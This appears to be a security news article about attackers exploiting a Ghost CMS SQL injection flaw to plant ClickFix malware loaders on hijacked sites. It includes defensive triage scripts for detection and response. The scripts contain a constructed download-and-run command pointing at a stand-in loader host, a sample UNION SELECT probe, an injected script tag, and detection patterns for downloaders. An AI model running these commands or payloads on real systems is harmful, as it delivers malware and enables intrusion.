CRITICAL: Ghost CMS SQL Injection Bug Turns Harvard, Oxford and 700 Other Sites Into ClickFix Launchpads

Threat actors are mass-exploiting CVE-2026-26980, a critical SQL injection bug in Ghost CMS, to harvest Admin API keys and inject ClickFix malware loaders into more than 700 hijacked sites including Harvard, Oxford, Auburn, and DuckDuckGo. A patch has been available in version 6.19.1 since February.

By Danny Mercer, CISSP — Lead Security Analyst May 26, 2026

There is a special kind of irony when a platform built to publish words gets turned into a delivery system for malware. That is exactly the position roughly 700 organizations running Ghost CMS find themselves in this week, and the list of casualties reads like an honor roll of institutions that should know better: Harvard University, Oxford University, Auburn University, DuckDuckGo. Universities, AI startups, security research firms, fintech companies, blockchain shops, and major media outlets all got pulled into a sprawling ClickFix campaign over the past two and a half weeks, and the entry point was a single SQL injection bug that has had a patch available since February.

The vulnerability is CVE-2026-26980, a SQL injection flaw in the Ghost Content API. GitHub's own CNA scored it 9.4 (critical) while NIST settled on a more conservative 7.5 (high). The gap comes down to whether you score only the data the injection reads, or also the integrity and availability impact of what that data lets an attacker do next. The crews running the current campaign settled the debate by demonstrating that the integrity impact is, in fact, catastrophic.

Here is how the attack chain works. An unauthenticated attacker hits the Content API with a crafted request that abuses the SQL injection to read arbitrary data from the underlying database. What they want is the Admin API key, which lives in the same database the injected query reads. Once they have that key, they pivot to the Admin API and start editing published posts. The vulnerability itself only grants database read access, but the credential it leaks is the master key to the entire content management system. From a CVSS scoring perspective this is a textbook example of why a confidentiality-only score can dangerously understate the real blast radius: the primitive is read-only, the outcome is arbitrary content on a trusted domain.

The injected payload is a two-stage JavaScript loader. Visitors browsing an infected article see a fake CAPTCHA prompt that walks them through what looks like a routine "verify you are human" workflow. The instructions tell the visitor to press Win+R, paste a Base64-encoded command into the Run dialog, and hit Enter. The command decodes to a PowerShell or curl payload that downloads a Windows executable and runs it with the user's privileges. This is the ClickFix pattern that has dominated commodity malware delivery for the past year, now riding on trusted university and media domains so the social engineering looks authoritative.
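As an added illustration for this article (not code from Ghost, XLab, or the campaign), the script below does the decode-and-inspect step a responder performs on a captured ClickFix command: it takes the text a victim was told to paste into the Run dialog, unwraps any Base64 blob the way PowerShell's -EncodedCommand does (UTF-16LE, with a UTF-8 fallback), and scores what comes out for download-and-execute indicators. The sample command, its curl one-liner, and the loader.example host are constructed for the demo; they are not indicators from this campaign, and the indicator list is a starting point rather than a complete ClickFix signature.

```python
import base64
import binascii
import json
import re

# Constructed sample of a ClickFix "Run dialog" command. The inner one-liner and the
# loader.example host are invented for this demo; they are not IOCs from the campaign.
_INNER = ('curl -s http://loader.example/stage2.exe -o %TEMP%\\s2.exe '
          '&& start %TEMP%\\s2.exe')
SAMPLE_RUN_COMMAND = ("powershell -w hidden -enc "
                      + base64.b64encode(_INNER.encode("utf-16le")).decode("ascii"))

# Base64 runs long enough to be worth decoding; short tokens such as flags are ignored.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicator families typical of ClickFix-style download-and-run one-liners.
INDICATORS = {
    "powershell": re.compile(r"\b(?:powershell|pwsh)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\b", re.I),
    "downloader": re.compile(
        r"\b(?:curl|wget|iwr|Invoke-WebRequest|DownloadString|DownloadFile)\b", re.I),
    "executor": re.compile(
        r"\b(?:iex|Invoke-Expression|start|Start-Process|mshta|rundll32|cmd)\b", re.I),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
    "executable": re.compile(r"\.exe\b", re.I),
}


def decode_blob(blob):
    """Base64-decode one token; returns text, or None when it is not a text payload."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, binascii.Error):
        return None
    # PowerShell -EncodedCommand is UTF-16LE; a NUL every other byte is the tell.
    encoding = "utf-16le" if b"\x00" in raw else "utf-8"
    try:
        text = raw.decode(encoding)
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def triage_run_command(command):
    """Unwrap Base64 layers in a pasted command and classify the combined text."""
    layers = [command]
    for blob in B64_TOKEN.findall(command):
        decoded = decode_blob(blob)
        if decoded:
            layers.append(decoded)
    combined = "\n".join(layers)
    indicators = {name: sorted(set(rx.findall(combined)))
                  for name, rx in INDICATORS.items() if rx.search(combined)}
    fetches_and_runs = "downloader" in indicators and "executor" in indicators
    has_target = "url" in indicators or "executable" in indicators
    if fetches_and_runs and has_target:
        verdict = "clickfix_loader"
    elif any(k in indicators for k in
             ("downloader", "executor", "encoded_command", "hidden_window")):
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"layers": layers, "indicators": indicators, "verdict": verdict}


if __name__ == "__main__":
    print(json.dumps(triage_run_command(SAMPLE_RUN_COMMAND), indent=2))
```

Run it against whatever the fake CAPTCHA page put on the clipboard, or what a user reports having pasted; the layers field preserves each decoding step so the decoded command can be handed to the EDR team as-is.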

Two separate threat actor groups appear to be running parallel campaigns against the same vulnerability, and researchers at QiAnXin's XLab observed the same compromised site poisoned, re-poisoned, and poisoned again within a 24-hour window as the two crews fought over the same real estate. That kind of competitive infestation is a strong signal that the underlying flaw is trivial to exploit at scale and that mass scanning has been running continuously against the Ghost user base.

Ghost, the company behind the open source CMS, shipped the fix in version 6.19.1 back in February of this year. The patch closes the SQL injection cleanly, but it does nothing to remediate sites that were already compromised. If an attacker pulled your Admin API key before you patched, upgrading does not lock them out: they still have the key, they can still authenticate, and they can still edit your posts. Any site that ran a vulnerable version between the February disclosure and its own upgrade needs to assume the key is burned and rotate it manually. The same goes for administrative passwords and session tokens, which the same database read primitive can expose (as hashes or live tokens, depending on configuration) and which should be reset and invalidated rather than trusted.

Affected versions span Ghost 3.24.0 through 6.19.0, which covers nearly six years of releases. That is a long tail of self hosted installations sitting on older versions because nobody wanted to deal with breaking changes in the Admin API or because the marketing team forgot the CMS exists between launches. The Ghost Pro hosted service was patched by the vendor automatically, so customers on that plan are largely fine assuming they are still on a supported tier. The self hosted population is where the carnage lives, and it is the population most likely to ignore security advisories from a CMS vendor.

Detection on this one is not subtle if you know where to look. Any Ghost site should be audited for unexpected JavaScript injected into post bodies, particularly script tags that reference external domains the editorial team did not approve. The XLab writeup includes a handful of indicators of compromise covering the loader domains and the staging infrastructure, and Bleeping Computer's coverage cross-references the same set. Searching web server access logs for Content API requests with SQL-like patterns in URL parameters will surface the initial exploitation attempts, and Admin API access should be reviewed for sessions originating from IP addresses that have never authenticated before. If your CMS sits behind a CDN, the CDN logs are the best source of truth: attackers who gain a foothold sometimes clear local access logs, but rarely have the access needed to scrub upstream telemetry.
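To show what the log review looks like in practice, here is an added example (written for this article, not Ghost's or XLab's tooling) that walks a combined-format access log, URL-decodes the query string of each Content API request and matches it against generic SQL-probe shapes, and flags Admin API requests from IPs outside a baseline of addresses that have authenticated before. The log lines are constructed, the IPs are from documentation ranges, the SQL shapes are generic rather than the CVE's real vector, and the /ghost/api/content/ and /ghost/api/admin/ prefixes are assumed; adjust them to what your install actually logs.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in combined log format. IPs come from documentation ranges and the
# query strings are generic SQL-probe shapes, not the actual CVE-2026-26980 vector.
SAMPLE_LOG = """\
203.0.113.9 - - [20/May/2026:03:14:07 +0000] "GET /ghost/api/content/posts/?key=abc123&limit=5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [20/May/2026:03:14:09 +0000] "GET /ghost/api/content/posts/?key=abc123&filter=tag%3A%27x%27%20UNION%20SELECT%201%2C2%2C3--%20 HTTP/1.1" 200 412 "-" "python-requests/2.31"
192.0.2.10 - - [20/May/2026:09:02:11 +0000] "POST /ghost/api/admin/session/ HTTP/1.1" 201 0 "-" "Mozilla/5.0"
198.51.100.77 - - [20/May/2026:11:45:52 +0000] "PUT /ghost/api/admin/posts/abc123/ HTTP/1.1" 200 6410 "-" "curl/8.5.0"
203.0.113.44 - - [20/May/2026:12:00:01 +0000] "GET /welcome/ HTTP/1.1" 200 21000 "-" "Mozilla/5.0"
"""

# Apache/nginx combined format: ip ident user [time] "METHOD path proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3})'
)

# Generic injection shapes; a hit means "look at this request", not proof of exploitation.
SQLI_PATTERNS = {
    "tautology": re.compile(r"'\s*(?:or|and)\s+\S+\s*=\s*\S+", re.I),
    "union_select": re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
    "comment_truncation": re.compile(r"--(?:\s|$)|/\*"),
    "schema_probe": re.compile(r"\b(?:information_schema|sqlite_master)\b", re.I),
}


def scan_access_log(log_text, known_admin_ips,
                    content_prefix="/ghost/api/content/",
                    admin_prefix="/ghost/api/admin/"):
    """Return a list of findings: SQL-like Content API queries and Admin API use from new IPs."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        route, _, query = path.partition("?")
        if route.startswith(content_prefix) and query:
            decoded = unquote_plus(query)  # match on what the server saw, not the escaped form
            matched = [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]
            if matched:
                findings.append({"line": lineno, "ip": ip, "patterns": matched,
                                 "reason": "SQL-like Content API query", "query": decoded})
        if route.startswith(admin_prefix) and ip not in known_admin_ips:
            findings.append({"line": lineno, "ip": ip, "path": route,
                             "reason": "Admin API request from IP with no prior authenticated session"})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG, known_admin_ips={"192.0.2.10"}):
        print(f)
```

Feed it the raw log text and a set of known admin IPs drawn from the months before the exposure window. A CDN or reverse-proxy log works the same way as long as the request line survives; if the CDN rewrites paths or uses its own field layout, swap the LOG_LINE pattern for that format and keep the rest.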

For incident response, the playbook looks like this in prose form. Upgrade to 6.19.1 or later immediately. Rotate every Admin API key, and do it in that order, because a key rotated on a still-vulnerable instance can simply be read out again. Force a password reset for all administrative users. Invalidate all active sessions. Diff every published post against your last known good backup and look for injected scripts or modified content. Notify your visitors that the site was compromised and recommend they run an antivirus scan if they followed any unusual instructions during the exposure window. Preserve forensic copies of access logs before they rotate out of retention, because if you are a regulated entity you may need them later. None of this is glamorous, and all of it is necessary.
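The post-diff step is the one most worth scripting, so here is an added example (not Ghost's code; the export layout db[0].data.posts, the sample posts, and the host names are assumed and constructed for the demo) that compares every post in a current JSON export against the last known good backup. It reports script tags pointing at hosts outside an allowlist, new inline script blocks, and posts that were not in the backup at all, and it still flags body changes that involve no script so an editor can review them by hand.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collects <script src=...> URLs and counts inline <script> blocks in a post body."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self.inline += 1


def scripts_in(html):
    """Return (external script URLs, inline script count) for one post body."""
    collector = ScriptCollector()
    collector.feed(html or "")
    collector.close()
    return collector.srcs, collector.inline


def posts_from_export(export):
    # Assumed layout of a Ghost JSON export: posts sit under db[0].data.posts.
    return export["db"][0]["data"]["posts"]


def audit_posts(current_posts, backup_posts, allowed_script_hosts):
    """Compare current posts with a known-good backup; return (slug, reason) findings."""
    backup_by_id = {p["id"]: p for p in backup_posts}
    findings = []
    for post in current_posts:
        slug = post.get("slug", post["id"])
        old = backup_by_id.get(post["id"])
        if old is None:
            findings.append((slug, "post not present in last known good backup"))
            old_srcs, old_inline = [], 0
        else:
            if (post.get("html") or "") == (old.get("html") or ""):
                continue  # byte-identical to the backup, nothing to review
            old_srcs, old_inline = scripts_in(old.get("html"))
        before = len(findings)
        new_srcs, new_inline = scripts_in(post.get("html"))
        for src in new_srcs:
            if src in old_srcs:
                continue
            host = urlparse(src).hostname  # None for relative, same-origin paths
            if host and host not in allowed_script_hosts:
                findings.append((slug, f"new external script from unapproved host {host}: {src}"))
        if new_inline > old_inline:
            findings.append((slug, f"{new_inline - old_inline} new inline <script> block(s)"))
        if old is not None and len(findings) == before:
            findings.append((slug, "body differs from backup with no script change; review manually"))
    return findings


# Constructed sample exports. The loader host is invented for the demo, not a campaign IOC.
_YT = '<p>Talk</p><script src="https://www.youtube.com/iframe_api"></script>'
BACKUP_EXPORT = {"db": [{"data": {"posts": [
    {"id": "p1", "slug": "welcome", "html": "<p>Hello</p>"},
    {"id": "p2", "slug": "embed", "html": _YT},
    {"id": "p4", "slug": "roadmap", "html": "<p>Q1 plans</p>"},
]}}]}
CURRENT_EXPORT = {"db": [{"data": {"posts": [
    {"id": "p1", "slug": "welcome",
     "html": '<p>Hello</p><script src="//cdn.loader.example/verify.js"></script>'},
    {"id": "p2", "slug": "embed", "html": _YT},
    {"id": "p3", "slug": "security-update",
     "html": "<p>Verify you are human</p><script>/* stage one */</script>"},
    {"id": "p4", "slug": "roadmap", "html": "<p>Q2 plans</p>"},
]}}]}
ALLOWED_SCRIPT_HOSTS = {"www.youtube.com"}


if __name__ == "__main__":
    for slug, reason in audit_posts(posts_from_export(CURRENT_EXPORT),
                                    posts_from_export(BACKUP_EXPORT),
                                    ALLOWED_SCRIPT_HOSTS):
        print(f"{slug}: {reason}")
```

Build the allowlist from the embed providers your editors actually use, and run the audit on a fresh export taken after the upgrade and key rotation so the comparison reflects the state you are about to trust.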

The ClickFix pattern itself deserves a moment of attention because it is going to keep finding new delivery vehicles. The technique works because it weaponizes the user's trust in the site they are visiting against the machine they are visiting it from. When someone sees a CAPTCHA on Harvard's news page they do not pause to ask whether universities normally serve CAPTCHAs that require pasting commands into the Run dialog. They follow the instructions because the instructions are coming from a domain they trust. Browser-based defenses cannot fully solve this because the malicious payload never executes in the browser; the browser is just the social engineering surface, and the execution happens in a shell the user opened themselves. Endpoint protection that blocks or alerts on unusual PowerShell or curl invocations spawned from explorer.exe (the parent of anything launched from the Run dialog) is one of the few controls that catches this reliably, which makes EDR coverage on Windows fleets a hard requirement rather than a nice to have.

For MSPs the angle here writes itself. Any client running a self-hosted CMS, whether Ghost or WordPress or Drupal, needs a managed patching cadence and a documented credential rotation procedure. Selling a CMS security review as a fixed-price engagement gets you in the door and gives you ammunition for an ongoing managed service contract. The conversation with prospects is straightforward when you can say that 700 organizations, including some of the most prestigious institutions in the English-speaking world, just got owned through a vulnerability that has had a patch available for three months. Pair that with an EDR upsell focused on ClickFix detection rules and you have a complete narrative that maps a real news story to a real security gap you can close for them this quarter.

Patch Ghost, rotate keys, audit your posts, and treat any self-hosted CMS in your environment as a high-value target until proven otherwise. This is a drop-everything-and-patch-now bug.
